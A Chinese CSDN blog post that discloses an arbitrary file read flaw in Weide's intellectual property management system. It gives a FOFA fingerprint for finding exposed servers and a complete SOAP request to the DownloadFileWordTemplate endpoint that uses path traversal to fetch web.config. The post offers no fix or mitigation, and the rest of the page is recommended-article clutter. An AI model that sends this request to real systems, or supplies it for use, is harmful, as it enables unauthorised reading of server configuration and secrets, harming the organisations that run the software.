唯徳知识产权产权系统存在任意文件读取漏洞

最新推荐文章于 2024-09-11 08:51:51 发布
最新推荐文章于 2024-09-11 08:51:51 发布
阅读量246 收藏
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/142019797
版权

漏洞描述

深圳市唯德科创信息有限公司(以下简称:唯德)于2014年在深圳成立,是专业提供企业、代理机构知识产权管理软件供应商,唯德凭借领先的技术实力和深厚的专利行业积累,产品自上市推广以来,已为1000多家企业及代理机构提供持续稳定的软件服务。唯徳知识产权产权系统DownloadFileWordTemplate存在任意文件读取漏洞。

FOFA:

body="/Scripts/JSCOMM/Box.js"

漏洞复现 

POC:

POST /AutoUpdate/WSFM.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/DownloadFileWordTemplate"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <DownloadFileWordTemplate xmlns="http://tempuri.org/">
      <fileName>../../web.config</fileName>
    </DownloadFileWordTemplate>
  </soap:Body>
</soap:Envelope>

 发包测试

 

马船长
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专利案件管理软件 系统
湾区人工智能
01-17 3717
 深圳市德科创信息有限公司帮助开发了案件管理系统。公司也有机房http://www.acip.vip/index.aspx  http://www.acip.vip/oa/index.aspx 
知识产权管理系统解决方案.docx
04-27
知识产权管理系统解决方案
知识产权产权系统DownloadFileWordTemplate存在任意文件读取漏洞
最新发布
weixin_43167326的博客
09-11 747
深圳市德科创信息有限公司(以下简称:德)于2014年在深圳成立,是专业提供企业、代理机构知识产权管理软件供应商,德凭借领先的技术实力和深厚的专利行业积累,产品自上市推广以来,已为1000多家企业及代理机构提供持续稳定的软件服务。知识产权产权系统DownloadFileWordTemplate存在任意文件读取漏洞
知识产权代理行业公司竞争分析
weixin_30752377的博客
03-16 600
知识产权代理系统 【CRM,为客户服务;OA,办公自动化{工作流引擎}】 彼速信息 微软的各个产品的整合,AD + Exchange + ERP + CRM(知识产权代理系统,可能就是Dymamic CRM和ERP实施以及行业定制工作)。 Dymamic CRM 成功案例:实施某知识产权代理公司 https://www.microsoft.com/china/cloudproductivi...
弟子规 古译今 详解
沉淀、分享、成长,让自己和他人都能有所收获!
06-29 737
弟子规》,原名《训蒙文》,是清朝李毓秀所作的三言韵文,约作于康熙年间;后经贾存仁(一说贾有仁 )修订改编,命名为《弟子规》。该文共为五个部分,其首章“总叙”将孔子的话,用三字句改编而成,正文分为“入则孝,出则悌”“谨而信”“泛爱众,而亲仁”“行有余力,则以学文”四个部分,并对其进行阐释;主要列举了为人子弟在家、外出,待人、接物、处世、求学时应有的礼仪规范。该文用佛家天台宗 " 五重玄义 " 的方法演义《弟子规》113件事背后的义理,便于学习者能切入其中。
12、乐趣国学—践行《弟子规》的“信”懂得处世之道(下篇)
不迁怒,不贰过。小知识,大智慧。
11-03 839
见人善 即思齐 纵去远 以渐跻 见人恶 即内省 有则改 无加警 德学 才艺 不如人 当自砺 若衣服 若饮食 不如人 勿生戚 闻过怒 闻誉乐 损友来 益友却 闻誉恐 闻过欣 直谅士 渐相亲 无心非 名为错 有心非 名为恶 过能改 归于无 倘掩饰 增一辜
该业务对象应用组织类型为空.不能设置编码规则(金蝶EAS创建编码规则报错)
qq_45241470的博客
06-30 466
在客户端的对应路径下,放一份报错对应的元数据所在的包 例如 D:\kdclient\jf\eas\client\metas\sp
穷人为何穷,富人为何富
yaohaojie的博客
12-28 814
1 .何以暴富,有拆迁 一个亲戚家里拆迁,分了5套房。 几天前的一个早晨,她6点多电话我家人,火急火燎地寻求帮忙。原来,目前亲戚刚拿到一套现房,想这几天马上装修马上入住,急着找装修。家人问,怎么这么着急啊?她说现在住在朋友家里太不方便了。家人又建议,可以考虑先现在附近租个房子过度一下。亲戚赶忙说,哎,不了不了,那多麻烦。对了,有靠谱的木工泥水师傅记得介绍给我啊,我准备这1,2周弄好就
邮件报 535 5.7.0 Error: authentication failed
SW_LCC的博客
04-06 8259
邮件发送认证失败,原因可能如下: (1)使用的账号,密码跟邮箱登陆的账号密码不一致。 (2)客户端授权码没有开启,可在邮箱设置查看客户端授权码,看POP3/SMTP服务和IMAP/SMTP服务是否开启 注意使用的主机名也要查看是否正确,否则会包550 5.7.1 Client does not have permissions to send as this sender 即使用了不存在或没权限的...
德学教学课件.ppt
12-08
"温故而知新"源自《论语》,意味着通过回顾旧知识来获取新理解。"见人善即思齐"是指看到别人的优点和善行,应以此为榜样,努力向其看齐。"纵去远以渐跻"表示即使目标遥不可及,也要逐步努力接近,体现出持之以恒的...
2019年水彩笔创业组-微德有限责任公司PPT+项目介绍视频_微德有限责任公司.ppt
04-29
2019年水彩笔创业组-微德有限责任公司PPT+项目介绍视频_微德有限责任公司.ppt
弟子规知识竞赛试题及答案.doc
09-10
【弟子规知识竞赛试题及答案解析】 《弟子规》是中国传统文化中的一部经典教育读物,由清代学者李毓秀编撰,旨在教导孩子们基本的道德规范和生活礼仪。这部著作经历了许多版本的修订,其中贾有仁和贾存仁的名字都与...
注册安全分析报告:熊猫频道
Explinks的博客
09-10 343
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
第146天:内网安全-Web权限维持&各语言内存马&Servlet-api类&Spring类&Agent类
weixin_71529930的博客
09-10 701
然后访问http://ip/,这里会卡住,把之前创建的index文件会被删除,后面的页面是我访问的缓存,同时会产生一个.HH.php文件,这个文件是linux的隐藏文件,但是不知为何,我linux搭建的访问不了,只能这样演示。在我去删除的时候,他又会立刻去创建出来,甚至在我鼠标右键的时候因为这个文件不断地创建,右键页面也不能打开,从时间也可以看出来这个文件,在一直的刷新。后面换成了小迪视频里面的冰蝎版本,视频中问题是木马不能再Upload目录下,这里我试了也不行,所以这个还是有很多的bug的。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 466
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1460
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
首个大模型供应链安全领域的国际标准,WDTA《大模型供应链安全要求》标准解读
银行信息系统应用架构导论
09-10 123
大模型供应链安全要求》标准通过提供供应链各个层面的安全管理要求,为组织构建更加安全的AI生态系统提供了明确的指导。这些模型在带来创新和便利的同时,也伴随着安全风险的增加。《大模型供应链安全要求》提出了大型语言模型(LLMs)的供应链安全保护框架,提出了管理LLMs开发、运营和维护(O&M)中涉及的供应链安全风险和供应活动的要求,并提供了常见的供应链安全风险和典型安全案例等相关信息。对供应商进行严格的选择和持续评估,确保其提供的产品和服务的真实性、完整性和准确性,并防止信息在供应链中被篡改或泄露。
Web3 项目安全手册
2301_76786857的博客
09-10 111
现如今针对 Web3 项目的攻击手法层出不穷,且项目之间的交互也越发复杂,在各个项目之间的交互经常会引入新的安全问题,而大部分 Web3 项目研发团队普遍缺少的一线的安全攻防经验,并且在进行 Web3 项目研发的时候,重点关注的是项目整体的商业论证以及业务功能的实现,而没有更多的精力完成安全体系的建设。通常项目方团队为了确保 Web3 项目的安全会聘请优秀的区块链安全团队对其代码进行安全审计,但是区块链安全团队的审计仅仅是短期的引导,并不能让项目方团队建立属于自己的安全体系。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值